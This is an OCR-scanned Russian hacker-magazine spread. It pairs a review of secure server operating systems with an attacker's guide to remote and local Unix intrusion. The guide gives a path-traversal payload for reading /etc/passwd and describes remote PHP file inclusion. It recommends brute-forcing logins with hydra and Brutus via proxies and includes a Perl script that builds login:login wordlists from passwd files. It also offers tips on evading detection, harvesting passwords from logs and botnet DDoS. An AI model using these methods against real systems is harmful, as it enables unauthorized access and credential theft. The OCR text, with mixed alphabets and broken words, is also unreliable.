- выделение процессу необходимой оперативной памяти. 
При ее недостатке - включение механизма Swap. Также AG- 
ро следит за обращением приложения к запрещенным 
участкам, к соседним сегментам и в случае генерации про- 
цессорного исключения снимает сбойный процесс, записы- 
вает сообщение в системный журнал. 

- предоставление высокоуровневого доступа к винчесте- 
ру и другим носителям информации. Ядро подключает 
файловые системы и дает простой интерфейс по взаимо- 
действию с ними. Все это делается с учетом прав на файлы 
и квот для пользователя. 

- Управление периферией. Предоставление процессам 
доступа к внешним устройствам. Обеспечение работы всей 
периферии - задача ядра и его окружения. Драйвера уст- 
ройств могут как включаться в ядро, так и быть подгружае- 
мыми модулями. Использование модулей невозможно в 
некоторых старых представителях семейства UNIX. 


INIT 6 

*nix-CACT@Ma имеет достаточно простую и логически 
правильную архитектуру. OC UNIX устойчива и друже- 
любна, вот только друзей оля себя она выбирает очень и 
очень тщательно. 2 
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таются *nix. У них 
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момент пос- 
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от простой логики pa- 
боты с пользователем 

gO высокой отказоустойчивости. Но 
не все йогурты одинаково полезны, а 
*nix одинаково стабильны - некоторые 
из них просто не рассчитаны на созда- 
ние безопасных хостов. Определимся 
с требованиями к системе, при выпол- 
нении которых ее смело можно будет 
ставить на сервера и другие критичес- 
ки важные системы. Итак, ОС должна 
иметь жесткую политику разграниче- 
ния доступа, должны быть встроенные 
или подключаемые средства для соз- 
дания комплексов firewall, необходимо 
ПО для отражения атак, наличие регу- 
лярных обновлений, возможность 
быстрого обнаружения взломов. 

Взглянем на рынок ОС сегодняшне- 
го дня. Мой выбор пал на следующие 
дистрибутивы: Mandrake 10 Official, 
Gentoo Linux 2004.2, FreeBSD 5.1, 
OpenBSD 3.5, QNX 6.2.1. 


INTRO 

m Нам нужен максимально безопас- 
ный и стабильный дистрибутив. Са- 
мые популярные дистрибутивы Linux 
базируются на КРМ-пакетах. Предста- 
вителем мира RPM-base стал nocneg- 
ний релиз Mandrake. Я выбрал его по 
нескольким причинам: все компонен- 
ты дистрибутива проходят тщатель- 
ное тестирование на совместимость, 
используется собственная модель 
взаимодействия с пользователями, 
высокая стабильность, проверенная 
годами. Можно было использовать 
канонический Red Hat, но политика, 
направленная на зарабатывание де- 
Her, отходит от классической УМХ-мо- 
дели, что явно не в пользу всей Фе- 
доры. В обзоре есть еще один вари- 
ант Linux-cuctem - Gentoo 2004.2. Это 
классический Source-base дистрибу- 
тив. При установке такой системы ты 
полностью сам закладываешь всю бе- 
зопасность хоста. Кроме этого, в 
Gentoo очень хорошо продумана схе- 
ма обновления ПО через интернет, 
что позволяет всегда использовать 
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ИЩЕМ САМУЮ ЗАЩИЩЕННУЮ СИСТЕМУ 


самые безопасные и защищенные 
версии сосбрта. 

Самым ярким и известным предста- 
вителем линейки BSD является 
FreeBSD. Очень многие сервера круп- 
ных организаций используют именно 
этот клон UNIX. Из основных плюсов 
можно выделить проверяемую годами 
архитектуру, отлаженную схему взаи- 
модействия компонентов, минималь- 
ное наличие известных уязвимостей. 
Еще очень сильно привлекает разви- 
тая система портов, которая позволя- 
ет обновлять всю систему, используя 
всего одну команду. Второй перспек- 
тивной реализацией BSD-mogenn ста- 
ла OpenBSD. Мой выбор пал именно 
на эту систему, потому что ее создате- 
ли изначально готовят свое детище к 
работе в сложнейших сетевых усло- 
виях: «Вот уже несколько лет, как не 
было зарегистрировано ни одного 
удаленного взлома машин, работаю- 
щих под управлением OpenBSD в кон- 
фигурации по умолчанию». И послед- 
няя система, о которой пойдет речь в 
нашем обзоре, - ОМХ. Это даже не 
UNIX в том понимании, которое близко 
нам. ОМХ - коммерческая ОС жесткого 


реального времени, совместимая со 
стандартом POSIX. То есть она может 
работать с очень многим ПО, написан- 
ным для UNIX. Основное отличие QNX 
от всех остальных операционок в том, 
что это система реального времени, 
взломов которой зарегистрировано не 
было вообще. После небольшого зна- 
комства с нашими кандидатами npeg- 
лагаю перейти к исследованию безо- 
пасности данных систем. 


LINUX МАМОВАКЕ 
www.mandrakelinux.com 

и Популярный дистрибутив Linux на 
рабочем столе. О дружественности 
продуктов этой компании говорит 
весь интернет. А что же с безопас- 
ностью? Уже в начале установки 
можно сделать выбор: тип expert или 
обычный. Следует отдать предпочте- 
ние первому варианту: чуть больше 
возможностей для тонкой настройки 
ОС при инсталляции. Пожалуй, самым 
главным этапом во всей установке 
для нас станет выбор уровня безопас- 
ности. Именно Tak MandrakeSoft nog- 
готовила свой дистрибутив к сервер- 
ному рынку. Первый и самый простой 


№. == 
Вот так выглядит QNX; идет процесс конфигурирования софтины 


уровень - стандартный. Этот вариант 
практически не предусматривает ни- 
какого контроля над безопасностью 
системы. Так, любой пользователь 
сможет читать произвольные катало- 
ги, кроме домашних директорий gpy- 
гих юзеров. Кроме этого, некоторые 
пользователи смогут просмотреть со- 
держимое конфигурационных срай- 
лов /etc. Полностью отсутствуют про- 
верки на новые/изменившиеся срай- 
лы в системе: разработчики считают, 
что за день столько сосфта наста- 
вишь/наудаляешь, что читать мега- 
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Стандартная звонилка QNX. Простая и 
очень мощная 


байтные логи своих действий не воз- 
никнет никакого желания. Также воз- 
можен непосредственный вход поль- 
зователя root прямо по SSH или с тер- 
минала, что кому-то удобно, но на са- 
мом деле очень опасно. Как видишь, 
первый уровень ориентирован на 90- 
машнее использование и на звание 
секьюрного варианта даже не претен- 
дует. Следующий уровень - высокий 

- также рассчитан на домашнее ис- 
пользование и поэтому нас тоже не 
интересует. Пожалуй, единственным 
приемлемым вариантом станет пара- 
ноидальный уровень. Для серверов 
следует использовать только его. Вот 
что он дает: невозможен непосресд- 
ственный вход пользователем root, 
никто не может читать корневую сай- 
ловую систему - у всех файлов и ка- 
талогов выставлены права на чтение 
только для root. Кроме этого, произ- 
водители значительно проработали 
механизм демонов - на этом уровне 
полностью реализована модель безо- 
пасности “каждому демону по потреб- 
HOCTAM", то есть любой сервис будет 
запускаться от своей учетной записи. 
Еще каждую ночь будут проводиться 
автоматические проверки на бэкдоры 
и руткиты - при любых изменениях 
файловой системы составляется про- 
токол, который отправляется админи- 
стратору. Защита от внешних атак ре- 


МНЕНИЕ ЭКСПЕРТА 


Со 


ализуется с помощью обязательной 
установки пакета iptables - системы 
Firewall. Mandrake постарается авто- 
матически выбрать необходимые пра- 
вила и применить их для данного хос- 
та. Причем у фаервола будет активи- 
рована опция, отвечающая за отра- 
жения попыток сканирования портов 
- практически ни один порт-сканер не 
сможет определить наличие работаю- 
щих сервисов. Таким образом, пара- 
ноидальный уровень старается соз- 
дать действительно защищенную 
крепость как для атак извне, так и для 
локальных взломов ;). 


LINUX GENTOO 
www.gentoo.org 

Это, ИМХО, один из лучших дист- 
рибутивов Linux по всем параметрам. 
Достать систему очень просто: ее 
можно скачать из интернета ( 

) либо заказать 2 CD в Мпих- 
центре ( ). Установка 
Дженту радикально отличается от 
аналогичной процедуры в Мапагаке- 
Ике-дистрибутивах. В этой сборке те- 
бе придется все делать руками и кон- 
солью. Именно поэтому не имеет 
смысла говорить о заранее предуста- 
новленных уровнях безопасности - 
их просто нет. Весь процесс инстал- 
ляции ты проводишь сам, и если твои 
знания Linux ограничиваются уров- 
нем KDE, то ни о какой безопасной 
системе даже не мечтай. Это я не к 
тому, что установить Gentoo трудно, а 
к тому, что создать защищенный хост 
на его базе новичку сложнее. Но, ес- 
ли ты владеешь секретами Linux в 
достаточной степени, то Дженту - 
для тебя. Вот почему я выбираю его: 
после установки на моем сервере 
есть только то, что я сам выбрал из 
исходников. То есть никаких левых и 
бажных сервисов не будет. Напри- 
мер, если это почтовый сервер, то на 
нем и будет установлен самый све- 
жий postfix, собранный из сорцов, с 
оптимизацией и повышенной защи- 
той. Всяких апачей и джабберов не 
будет даже в проекте. Такой подход к 
безопасности ОС позволяет держать 
на сервере минимальный набор са- 
мых необходимых демонов. Но соз- 
дать Linux исключительно под свои 
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Linux взял 
все лучшее 
иот BSD - 
скрипты 
инициализа- 
ции и сис- 
тему пор- 
тов, и от 
Linux - 
простоту и 
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плюс 
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простота и 
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ность. 
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Настраиваем сетевой интерфейс 


OpenBSD 
представля- 
ет собой 
минимально 
необходи- 
мые компо- 
ненты сис- 
темы, но 
они пре- 
дельно ста- 
бильны. 


Первым 
стабильным 
релизом 
FreeBSD 
пятой ветки 
станет 
FreeBSD 
5.3. Дата 
выхоба - 

3 октября 
2004 года. 


нужды - это только часть возможнос- 
тей Gentoo. Однажды установив и 
настроив систему, можно надолго за- 
быть о поддержании сервера в боес- 
пособном состоянии. У нашего пинг- 
вина есть встроенные средства об- 
новления и установки ПО прямо из 
интернета, без участия администрато- 
ра! Именно поэтому я считаю Gentoo 
самым секьюрным дистрибутивом 
Linux на сегодняшний день. Докажу 
тебе это, раскрыв сущность процесса 
обновления ОС. Установка нового ПО 
на машину с Gentoo происходит с по- 
мощью утилиты етегде. Принцип ра- 
боты этой программы очень прост: 
когда root (или crond) отдает команду 
“emerge Имя_Программы", система 
идет в интернет, скачивает сорцы 
этой программы с сайта поддержки 
Gentoo, компилирует и устанавливает 
бинарники. Все происходит в пол- 
ностью автоматическом режиме. А 
если учесть, что софт для Дженту об- 
новляется практически каждый день, 
то ты поймешь, что грамотный админ 
и Gentoo Linux создадут суперсекь- 
юрный сервер. Достаточно один раз 
разобраться во всем и настроить, к 
примеру, тот же Араспе, а потом за- 
писать в Crontab команду “emerge 
Apache" на ежедневное выполнение, 
и все! Взломать систему через уязви- 
мость в Apache станет практически 
невозможно (на каждый неуязвимый 
Апач найдется свой приватный 
эксплоит :) - прим. AvaLANche'a)! 


2 


Выбираем уровень безопасности 
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ЛЯ КРЕМЛЯ 


В основе OpenBSD лежат хорошо 
проверенные и отлаженные исходные коды. 


FREEBSD 
www.freebsd.org 

и Вот добрались и до прямых NOTOM- 
ков UNIX. Пожалуй, FreeBSD - это са- 
мый известный клон UNIX на сегодня. 
Разработчики этой системы стараются 
выпускать только стабильные и хоро- 
шо отлаженные продукты. Именно по- 
этому, хотя вся система доступна в ис- 
ходных кодах, добавлять патчи и но- 
вые возможности в ядро могут только 
разработчики, входящие в официаль- 
ную группу поддержки проекта. Это 
отличает FreeBSD от всех остальных 
систем Open Source. Создатели наце- 
ливают свой продукт на серверный 
рынок: во время установки у тебя бу- 
дут спрошены не только сетевые па- 
раметры, но и то, какие сервисы тебе 
необходимы, и даже будет предложе- 
но организовать ЕТР-доступ сразу 
после инсталла. При первом запуске 
необходимо начать обустраивать за- 
щиту сервера. Система позволит про- 
вести кое-какие настройки и с по- 
мощью утилиты /stand/sysinstall. Ho 
там представлен очень и очень скуд- 
ный набор инструментов. Всю наст- 
ройку ОС нужно проводить ручной 
правкой коноригов. И хотя разработ- 
чики постарались снабдить FreeBSD 
подробной документацией на анг- 
лийском языке, они не учли того, что 
для создания защищенного хоста не- 
обходимо затратить огромное количе- 
ство времени на перелопачивание 
конфигурационных сфайлов. А если 
ты не профессионал, то и на чтение 
огромной кучи документации. Исполь- 
зование ее на сервере оправданно 
только в том случае, если твои знания 
именно этой системы тебе это позво- 
ляют. Стабильность хоста под 
FreeBSD будет определяться не безг- 
лючностью сосфта, а грамотностью ag- 
мина. Практически все взломы этой 
ОС имели в своей основе не ошибки в 
демонах, а неправильное администри- 
рование. Я бы не рекомендовал ста- 
вить Фряху админам средней руки - 
может не хватить времени на реали- 
зацию мечты о защищенном сервере. 
Злые негодники поломают систему, 
прежде чем админ успеет разобрать- 
ся со всеми тонкостями настройки. 


OPENBSD 
www.openbsd.org 

и OpenBSD - общепризнанный ли- 
дер по безопасности. Текущая вер- 
сия - 3.5. Установка этой системы 
протекает аналогично установке 
всех остальных BSD с тем лишь OT- 
личием, что все пронизано духом бе- 
зопасности. После инсталла остается 
не так уж много: скачать и устано- 


вить необходимые демоны. Просто в 
OpenBSD ставится только самое не- 
обходимое для запуска. Все gonon- 
нительные демоны и сервисы адми- 
нистратор добавляет и настраивает 
сам, и это, по-моему, лучший подход 
к безопасности. Кроме того, в основе 
OpenBSD лежат тщательно прове- 
ренные и отлаженные исходные ко- 
ды, ежедневный аудит программного 
обеспечения приносит свои плоды: 
за несколько последних лет не было 
зарегистрировано ни одного взлома 
(в дефолтовой конфигурации). Сущ- 
ность аудита OpenBSD достаточно 
проста: существует небольшая груп- 
па высококвалифицированных IT- 
специалистов, которые постоянно 
анализируют исходные коды всей 
системы. И если учитывать, что они 
предлагают только базовую конфи- 
гурацию, то можно верить, что про- 
верка будет проведена очень качест- 
венно. Предельно сильная внутрен- 
няя защита подкрепляется перера- 
ботанным и усложненным комплек- 
сом Firewall. И дополняет общую кар- 
тину укрепленности собственный 
сайт, на котором ежедневно выстав- 
ляются все обновления для текущей 
версии системы. Неприхотливая к 
квалификации админа Kak Т-специа- 
листа, OpenBSD завоевывает рынок 
за счет своей подготовленной гра- 
мотной настройки. Таким образом, 
лучшим секьюрным дистрибутивом 
линейки BSD является OpenBSD: gna 
мастеров она покажет мощь и ста- 
бильность UNIX с возможностью гиб- 
кой настройки, а для новичков - за- 
щищенность и отказоустойчивость 
прямо “из коробки". 


ONX 
www.gnx.com 

m Я не случайно поставил эту OC 
последней в обзоре - она не клон 
UNIX. Это самостоятельная ОС, и 
очень занятная. Разработки этой 
системы ведутся уже более двадца- 
ти лет. Проект полностью закрытый, 
коммерческий. Лицензия на ОМХ для 
разработчика стоит 6000S. Я не 
ошибся - именно долларов, цена же 
полной версии переваливает за 15 
килобаксов. Но существует неком- 
мерческая версия, доступная бесп- 
латно. В свободной версии есть 
практически все необходимое для 
работы данной ОС на сервере, вклю- 
чая средства для сборки СМУ-прог- 
рамм. Самое главное в этой системе 
- то, что она полностью отвечает 
требованиям ОС реального времени, 
то есть ядро в принципе не может 
зависнуть ни при каких обстоятель- 


Средство установки и настройки FreeBSD 


ствах ;). И, кроме этого, данная ОС гарантирует ответ сер- 
вера через очень малый промежуток времени. За всю 
историю QNX не было найдено ни одной уязвимости в 
коде системы. Сразу виден серьезный подход програм- 
мистов QSSL. Как видишь, пока все просто идеально. Но 
это все относится к самой системе. Своего же ПО, необ- 
ходимого для создания полноценного сервера, у нее нет. 
ОМХ используется в основном во встраиваемом обору- 
довании, для узкоспециализированных задач на произ- 
водстве. Но отсутствие софта именно для ОМХ никого не 
остановило: я все чаще встречаю на просторах рунета 
админов-энтузиастов, запускающих сервера Ha ее базе. 
Да и сам, чего скрывать, перевел свой web-cepBep на эту 
систему и пока нисколько не жалею. Итак, что нужно для 
создания суперзащищенного сервера реального време- 
ни на базе ОМХ? Самое главное - это дистрибутив систе- 
мы. Для нашей задачи вполне достаточно МЕ (Моп- 
Commercial) версии, которая поставляется Ha 1 CD. Суще- 
ствует несколько способов получения этого диска. Пер- 
вый - скачать с официального сайта WwwW.gnx.com образ 
диска и записать его самому. В этом варианте есть неп- 
риятные моменты: сливать надо около 300 мегов, при- 
чем выкачать надо за один раз все - докачка не поддер- 
живается. Кроме того, скорость скачки должна быть не 
меньше 10 Кб в секунду, иначе их сервер будет закры- 
вать сессию и придется начинать все с начала. Другой 
вариант - попробовать получить по почте бесплатно 
полную версию ОМХ для вузов (напряги декана - и будет 
тебе счастье!) (вся информация на сайте www.swdru). И, 
наконец, самый простой и доступный путь - заказать 
книгу “Операционная система реального времени QNX: 
от теории к практике", которая продается во многих ин- 
тернет-магазинах, причем обойдется тебе она вместе с 
диском не дороже 250 руб. После простой инсталляции 
ты попадешь в самую быструю и стабильную ОС. Все 
современные версии поддерживают ТСР/ЛР-протокол в 
полной мере, поэтому тебе останется только установить 
и отконфигурировать серверное ПО. Кстати, получить 
весь необходимый софт можно либо на страничке OGHO- 
го из участников проекта WwWW.Gnx.org.ru, либо собрав его 
самостоятельно из исходников, ведь система POSIX-coB- 
местима. Эта ось, пожалуй, лучший выбор, но только 
для профессионалов и тех людей, которые готовы 60- 
роться с трудностями. 


ХЕППИ ЭНД 

и Воти все, что я хотел рассказать о дистрибутивах се- 
годняшних дней. Подведем итоги. Среди Linux-c6opok са- 
мый лучший выбор для защищенного хоста - это Gentoo 
Linux. Если нужно поставить быстро и более-менее каче- 
ственно сервер и нет знаний или желания самому созда- 
вать защиту - Mandrake 10 Official с максимальным уров- 
нем безопасности очень даже неплох. Если ты поклонник 
демона, твой выбор исключительно OpenBSD - разработ- 
чики очень хорошо позаботились о создании секьюрной 
системы. Для любителей сложных путей - ОМХ. Ее ис- 
пользование характеризуется отсутствием зависаний 
сервера, и микроядерная система реального времени га- 
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ИНТЕЛЛЕКТ, 


ОБЗОР УДАЛЕННЫХ И ЛОКАЛЬНЫХ АТАК 


подчиниться заветной команде. 


рамотный взломщик никогда не ограничивается одной неудавшейся атакой. 

Он пытается найти конкретный подход к серверу. В большинстве случаев 
ему это удается. А все потому, что он знаком с большинством видов атак и 
последовательно перебирает их, пока, наконец, несчастный сервер не 


ипичная ошибка начинающе- 
го взломщика заключается в 


том, что он настойчиво пыта- 
ется атаковать сервер одним 
единственным способом (нап- 
ример, WWW-ckaHupoBaHiew). Если у него ни- 
чего не выходит, злоумышленник ищет но- 
вую жертву. А зря, ведь можно было исполь- 
зовать другой вид нападения и в результате 
получить какие-нибудь права на машине. 
Число различных атак, которые можно при- 
менить к жертве, недалеко от нуля, поэтому 
придется в поте лица щупать машину на на- 
личие крупных дырок. 


УДАЛЕННОЕ НАПАДЕНИЕ 

m Все атаки начинаются с удаленного сбо- 
ра информации. Сперва хакер не владеет ни- 
какими данными о хосте. Но постепенно за- 
пас знаний увеличивается, а в голове сете- 
вого партизана появляются какие-то намет- 
ки. Выбрать вид нападения - еще то искус- 
ство. Сейчас я расскажу об основных уда- 
ленных атаках, а также о том, как их пра- 
вильно осуществить. 


ОХОТА ЗА БАЖНЫМИ ДЕМОНАМИ 

m= Первым и, пожалуй, самым излюбленным 
методом удаленного нападения является 
атака с применением эксплоита к уязвимому 
сервису. Но прежде чем атаковать этот уяз- 
вимый сервис, его еще необходимо обнару- 
жить. А это не всегда просто сделать. Препя- 
тствия могут быть какими угодно - различно- 
го рода программы, защищающие тачку от 
сканирования портов, умные админы, подме- 
няющие баннеры сервисов, настроенный 
(или частично настроенный) брандмауэр, ко- 
торый режет незванные пакеты. За мою не- 
долгую сетевую жизнь мне приходилось 
сталкиваться с разными трудностями, но это 
еще не говорит о неуязвимости демона. 

Есть одна хакерская мудрость: лучшее ска- 
нирование - ручное сканирование :). Это час- 
тично так - скан вручную избавляет от нега- 
тивного влияния различных антипортскане- 
ров, установленных админом на сервере. 
Когда мне хочется найти сервер с уязвимым 
сервисом CVS и пробить его новым эксплои- 
том, я никогда не буду сканировать весь диа- 
пазон портов на машине. Зачем? Я просто 
выполню команду «telnet victim.com 2401» и 
проверю наличие демона на тачке. Затем 
бесшумно запущу сплоит и получу искомый 
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‚ Безопасный ручной скан 


шелл. Если даже сервис пропатчен, никаких 
следов я не оставил, посему обвинить меня в 
деструктивных действиях никому не удастся. 

Если принято решение сканировать сервер, 
делать это лучше с безопасного места. До- 
вольно глупо пользоваться различными прог- 
раммами типа LANGuard несмотря на удобство. 
Если хочется, чтобы провайдер никогда не уз- 
нал о факте сканирования (не его, а уделенно- 
го сервера), запускай птар в невидимом режи- 
ме на далеком рутшелле. Впрочем, LANGuard 
оправдывает себя, будучи запущенным на хак- 
нутой Bulge в терминальной сессии :). 

Бывает, что версия демона отличается от 
бажной. Тем не менее, стоит попробовать 
натравить эксплоит на машину, ибо некото- 
рые особо активные сисадмы обожают под- 
менять баннеры своих сервисов. Я уже пи- 
сал о том, как отличить поддельный баннер 
от подлинного (XSpeZ OS4Hack), поэтому 
повторяться не буду. 

Использование эксплоита - классический 
взлом, но часто сетевому партизану не по зу- 
бам хакнуть сервер этим способом (к приме- 
ру, из-за фаервола). Тогда приходится при- 
бегать к другим, менее благодарным спосо- 
бам взлома. Например, к сканированию web- 
скриптов. 


КРИВОЙ СКРИПТ - КЛЮЧ К СЕРВЕРУ 
и Поняв, что просканировать порты серве- 
ра не удается даже вручную, взломщик мо- 


Невидимый птар 


жет обратить внимание Ha WWW-30Hy 
сервера. В 90% случаев порт 80 жерт- 
вы будет открытым, а все потому, что 
цель данного сервера - занятный web- 
проект, который вполне может содер- 
жать дырявые скрипты. 

В наше время встретить статический 
контент сайта очень сложно, поэтому 
у злоумышленника больше шансов 
на успех. Бывает, что первоклассный 
админ возомнит себя Web-macTepoM и 
напишет такой скрипт, защита которо- 
го оставляет желать лучшего. Этим 
хакер и воспользуется! Однако он 
должен уметь быстро отличать баж- 
ный скрипт от нормального. 

В первую очередь нужно обращать 
внимание на параметры, переданные 
сценарию методом СЕТ - такие скрип- 
ты сразу видно. Например, попробо- 


вать немного изменить значение оп- 
ЦИИ на название системного файла. 
Только следует делать замену разум- 
но. Допустим, присутствует параметр 
file, равный articlel. Если попробовать 
модифицировать значение на что-ни- 
будь типа «../../../../../etc/pass- 
wd%00», может улыбнуться удача. 
Ведь нулл-баг существует даже в 
последней версии Perl. 

В случае с РНР можно поэксплуати- 
ровать баги, характерные для этого 
интерпретатора. Если вдруг встретит- 
ся опция page=blabla, можно заму- 
тить как открытие системного файла, 
так и cross-side-ataky. Для этого соз- 
дается РНР-файл с любым кодом на 
другом сервере и передает ссылка на 
него в качестве параметра. При хоро- 
шем раскладе скрипт загрузится, а 
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его содержимое будет выполнено на 
атакуемом сервере. 

Эта информация - лишь азы взлома 
через WWW. Хочешь узнать больше по 
хаку сценариев - читай статью про уда- 
ленное выполнение команд, а также 
подпишись на новости багтрак-лент. 

Если хакеру везет, он быстро нахо- 
дит уязвимые сфайлы. Но бывает, что 
все сценарии неуязвимы. В этом слу- 
чае взломщик обязательно попробу- 
ет просканировать web-cepBep на на- 
личие бажных скриптов. Здесь ему 
поможет обычный WWW-ckaHep, каких 
в инете развелось великое множест- 
во. От себя могу порекомендовать 
перловый скрипт сзсап.р! 
(kamensk.net.ru/1/x/cscan.tar.gz), позволяю- 
щий сканить машины с любой *nix- 
консоли. Это удобно и безопасно од- 
новременно. В архиве помимо скане- 
ра расположена база уязвимых сце- 
нариев (правда, она довольно старая 
и уже покрылась плесенью ;)). 

Ты можешь сказать, мол, сканировал 
я эти сервера и ничего, кроме чтения 
файлов, не добился. Действительно, 
никаких привилегий от просмотра со- 
держимого /etc/passwd не поднять. Но 
это может послужить толчком к более 
действенному методу. 


ПЕРЕБЕРИ ВСЕ ВАРИАНТЫ 

и Если взломщику частично повез- 
ло с WWW, то он пробует атаковать 
сервер 6pytcpopcom. Конечно, ты слы- 
шал, что этот метод заключается в пе- 
реборе пароля на определенный сер- 
вис. На первый взгляд покажется, что 
просто бессмысленно прогонять все 
варианты паролей через сеть. Но 
только на первый. Если удалось про- 
читать /etc/passwd, это уже первый 
шаг к победе, ведь известны все сис- 
темные логины. Остается запустить 
OpyTcpopcep и озадачить его перебо- 
ром нескольких простых паролей на 
указанные логины. На самом деле, 
брутфорс - это целое искусство, кото- 
рое постигается годами. Матерый ха- 
кер сразу чувствует, что пользова- 
тель lamerl вообще не имеет пароля, 
а юзер lamer2 заходит под паролем 
qwerty. 

Лично я руководствуюсь нескольки- 
ми правилами, когда прибегаю к брут- 
cpopcy. Во-первых, если /etc/passwd 
очень длинный и содержит множест- 
во аккаунтов, есть вероятность того, 


Если уда- 
лось подоб- 
рать пароль 
для ЕТР, 
грех не поп- 
робовать 
его для 
SSH. Мно- 
гие админы 
используют 
/etc/shadow 
для всех 
сервисов, 
поэтому 
возможно, 
что пароли 
совпадут. 


Можно 
просмот- 
реть все 
системные 
логи в 
/var/log и 
найти там 
пароли. Та- 
кое случа- 
ется, если 
на машине 
вертится 
демон ради- 
уса с пол- 
ным деба- 
гом. 


_ = 


“| 


НИЕ 
1 


НН 


Пример кроссайдинга 


+ МХ 


= 
a 
= 
c 
> 
- 
о 
= 
о. 
|= 
li 
= 


*NIX 


= 
a 
= 
|= 
> 
- 
о 
> 
о. 
|= 
li 
= 


ATAKA ИНТЕЛЛЕКТА ) 


= 
+ 
—й 
=i 
= 


*# ite & 


at 


Не поленись 
и пропарси 
access_log 
ot Apache, 
если тако- 
вой имеет- 
ся. Дело в 
том, что все 
пароли, пе- 
реданные 
методом 
СЕТ, будут 
записаны в 
этот жур- 
нал. 


Когда админ 
запретил 
использова- 
ние коман- 
ды locate 
или не ус- 
тановил ее 
на сервер 
вообще, ис- 
пользуй в 
качестве 
поисковой 
команды 
бинарник 
find. 
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Самый лучший брутфорсер 


что пароль равен логину. И эта веро- 
ятность тем выше, чем больше запи- 
сей в системе. Естественно, придется 
перебрать все строки файла и выбро- 
сить юзеров, которые не имеют шел- 
ла (зачем нам неполноценные аккаун- 
ты?), а затем составить списочек типа 
«login:login». После всего взломщик 
скормит этот увесистый список прог- 
рамме-брутсрорсу. 

По доброте душевной я написал не- 
большой перловый сценарий, кото- 
рый умеет перегонять данные из 
/etc/passwd в базу для брутфорсера. 
Делает он это быстро и качественно, 
отбирая только валидные аккаунты. 

Что касается OpyTcpopcepa, могу 
привести тебе пример как под Винду, 
так и nog *nix. Классическим софтом 
nog Win32 является, конечно же, 
программа Brutus. Она умеет многое, 
но совсем не поддерживает прокси. 
Поэтому я люблю сводить Brutus с 
программой Sockscap и гнать трафик 
через безопасные соксы. Либо, как 
вариант, можно юзать Brutus на уда- 
ленной машине, соединившись с ней 
подручным терминальным клиентом. 

Юниксоидам понравится творение 
хакерской команды THC (11с.0г0) nog 
названием hydra 
(http://thc.org/download.php?t=r&f=hydra-4.1- 
src.tar.g2). Этот брутерорс по возмож- 
ностям даже опережает Brutus, пос- 
кольку умеет перебирать аккаунты на 
маршрутниках С15со и по различным 
протоколам (VNC, https, netbios и т.п.). 
Что касается простых служб Tuna FTP 
и POP3, то многопоточная hydra тоже 
легко справится с задачей. Требуется 
лишь задать несколько главных 
(воролист, хост, порт и название сер- 
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СЦЕНАРИЙ PARSER.PL 


#!/usr/bin/perl 
Sin=SARGV[O]; 


Sout=SARGV[1]; ## Определим параметры скрипта 


exit print “Use $0 Sin Sout\n” unless (Sout); 


open(IN,"Sin"); 
open(OUT,">Sout"); 
while(<IN>) { 
chomp; 


if (~/shS/) { ## Запишем только валидные аккаунты 


(Su,@undef)=split ":"; 


print OUT "Su:Su\n"; ## В виде пары login:login 


} 

} 

close(IN); 
close(OUT); 


виса) и второстепенных (число пото- 
ков, погорайл, останов при подборе 
первого пароля, перебор пары 
login:login) параметров, и hydra отпра- 
вится в бесконечный цикл :). Ничто не 
мешает оставить этот длительный 
процесс в покое и лишь периодичес- 
ки проверять результат работы прог- 
раммы. А что еще остается, если gpy- 
гие методы не помогли?.. 

Бывает, что админ защитил свой 
Web-pecypc динамическими изобра- 
жениями. В этом случае софтварные 
брутфорсеры отдыхают. Придется 
прибегнуть к интеллектуальному, или, 
попросту, ручному, перебору. Если ты 
знаешь логин к ресурсу, можно по- 
добрать пароль, каждый раз вводя 
новый код на изображении. Для об- 
легчения работы можно использо- 
вать различные тулзы для браузеров, 
которые обеспечат автозаполнение 
неизменных полей. 


УБЕЙ ЕГО ПРАВИЛЬНО 

и Случается так, что злоумышлен- 
нику не нужен шелл, а взлом ведется 
только для того, чтобы стереть маши- 
ну с лица интернета. Такие атаки час- 
то выполняются по заказу. DDOS от- 
носится к самым злосчастным атакам, 
за проведение которой могут отор- 
вать конечности. Все из-за того, что 
весь перегнанный мусор оплачивает 


владелец сервера. А ему этого ой как 
не хочется делать :). 

У серьезных проектов существует 
своя служба безопасности (или 
abuse). Ее задача - распознавать ата- 
ки и сообщать владельцам сетей об 
их факте. В связи с этим, никто никог- 
да не занимаются 000$, используя 
сервера в сети своего провайдера. 
Чаще всего подобные злодеяния со- 
вершаются из консоли забугорных 
машин. Такие системы "заражены" 
специальными ботами, которые умеют 
обмениваться данными между собой. 
Скажем, захотел хакер убрать white- 
house.gov. Для этого он соединяется с 
зарутанным китайским сервером, ко- 
MaHgyeT в консоли «./ddos white- 
house.gov» и идет пить пиво. После 
запуска программа ./ddos заглядыва- 
ет в свой консориг, находит там пару 
сотен таких же "затроянненых" сис- 
тем и шлет всем команду. В ней, как 
ты уже догадался, содержится при- 
нуждение убить сайт whitehouse.gov. 
Конечно, программа ./ddos - чистая 
абстракция, но принцип работы зом- 
би-серверов именно такой. 

Помимо программ существуют злые 
18 С-боты и целые ботнеты, созданные 
для того, чтобы останавливать работу 
серверов любой мощности. Если бото- 
вод заставит на определенном канале 
орлудить какую-нибудь жертву, все бо- 
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Обмен между машинами-зомби 


ты разом начнут слать сетевые пакеты 
на различные сервисы, в результате 
чего сервер просто не справится с их 
обработкой. Для справки, число таких 
ботов может колебаться от пары сотен 


gO нескольких десятков тысяч на од- 
ном канале. За более подробной ин- 
формацией по Воб-атакам, обращайся 
к тематической статье в этом номере. 


ЛОКАЛЬНЫЕ ШАЛОСТИ 

В случае успешно проведенной 
удаленной атаки, взломщик получит 
какие-нибудь системные привиле- 
гии. Именно этот исход можно счи- 
тать удачным, поскольку за удален- 
ной атакой всегда следует локаль- 
ная. Настало время понижать добы- 
тые права go магического уида 0, 
перед которым преклонятся даже 
самые защищенные бинарники ;). Но 
получить рута очень сложно (осо- 
бенно в защищенных системах), поэ- 
тому постоянно приходится вклю- 
чать соображаловку и быть впереди 
админа хотя бы на один шаг. Это 
очень непросто, но возможно. 


СКАЧАЙ, ЗАПУСТИ И СЛОМАЙ! 

Самый первый и легкий путь ло- 
кального взлома - применение 
эксплоита. Правда, вместо предвари- 
тельного сканирования портов при- 
дется найти бажный суидный бинар- 
ник либо дырочку в ядре, а только по- 
том подыскивать нужный сплоит. 
Проблемы при использовании этой 
атаки могут быть самыми разными. 
Первая - отсутствие багов. Если сис- 
тема свежая, даже в случае сущест- 
вования рабочего эксплоита простому 
смертному его не достать. Бывает, что 
и в убогих системах админы патчат 
ядро и нещадно сносят все уязвимые 
бинарники (либо снимают с них суид- 
бит). И, наконец, использовать 
